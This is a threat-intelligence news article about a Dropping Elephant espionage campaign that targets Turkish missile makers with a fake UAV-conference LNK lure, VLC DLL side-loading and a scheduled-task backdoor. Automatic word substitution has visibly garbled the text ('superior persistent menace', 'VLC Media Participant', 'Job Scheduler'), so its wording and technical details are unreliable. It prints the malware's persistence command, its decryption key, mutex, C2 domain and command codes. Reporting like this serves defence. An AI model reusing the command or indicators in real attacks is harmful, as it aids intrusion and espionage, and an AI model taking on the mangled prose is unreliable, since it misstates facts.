The Dropping Elephant superior persistent menace group has launched a classy cyber-espionage marketing campaign concentrating on Turkish protection contractors, significantly firms manufacturing precision-guided missile methods.
This malicious operation represents a big evolution within the group’s capabilities, using a fancy five-stage execution chain that cleverly disguises malicious payloads as respectable convention invites associated to unmanned automobile methods.
The assault begins with a weaponized LNK file named “Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.lnk” that masquerades as an invite to a UAV convention scheduled for July 2025 in Istanbul.
Upon execution, the file initiates a PowerShell-based obtain sequence that retrieves a number of parts from the malicious area expouav[.]org, which impersonates the respectable convention web site waset.org.
Professional waset.org web site with the identical convention info utilized by the faux PDF-based duplicate (Supply – Arctic Wolf)
Arctic Wolf researchers recognized this marketing campaign as a part of Dropping Elephant’s expanded concentrating on scope, noting the group’s strategic shift from conventional South Asian targets to NATO-allied protection industries.
The timing coincides with heightened Turkey-Pakistan protection cooperation and regional army tensions, suggesting geopolitically motivated intelligence gathering aims.
The malware demonstrates refined evasion strategies by abusing respectable software program parts, particularly VLC Media Participant and Microsoft Job Scheduler, by means of DLL side-loading mechanisms.
This strategy permits the menace actors to mix malicious actions with trusted processes, considerably lowering detection possibilities by safety options.
Superior Persistence and Command Execution Framework
The marketing campaign’s most notable innovation lies downloads 5 distinct information with intentionally obfuscated extensions.
The PowerShell execution employs stealth parameters together with -ep 1 for execution coverage bypass and $ProgressPreference=”SilentlyContinue” to suppress visible indicators throughout the obtain course of.
The assault chain begins by downloading a respectable VLC Media Participant executable (initially named “lama”) alongside a malicious libvlc.dll library (initially “lake”).
This DLL serves as a shellcode loader accountable for decrypting and executing the ultimate payload saved in vlc.log. The decryption course of makes use of a hardcoded key “76bhu93FGRjZX5hj876bhu93FGRjX5” to remodel the encrypted shellcode right into a useful x86 PE executable.
Persistence is established by means of a scheduled process created by way of the command:-
saps “C:WindowsTasksWinver” -a “/Create”, ‘/sc’, ‘minute’, ‘/tn’, ‘NewErrorReport’, ‘/tr’, “C:WindowsTasksvlc”, ‘/f’;
This process executes the compromised VLC participant each minute, making certain steady system entry whereas sustaining the looks of respectable media participant exercise.
The ultimate payload communicates with the command-and-control server roseserve[.]org, which impersonates Turkey’s Pardus Linux distribution web site.
The malware creates a mutex named “ghjghkj” to stop a number of situations and implements seven distinct command handlers, together with screenshot seize (3SC3), file add (3ngjfng5), and distant code execution (3gjdfghj6) capabilities, offering complete system management to the attackers.
Expertise sooner, extra correct phishing detection and enhanced safety for your enterprise with real-time sandbox analysis-> Strive ANY.RUN now
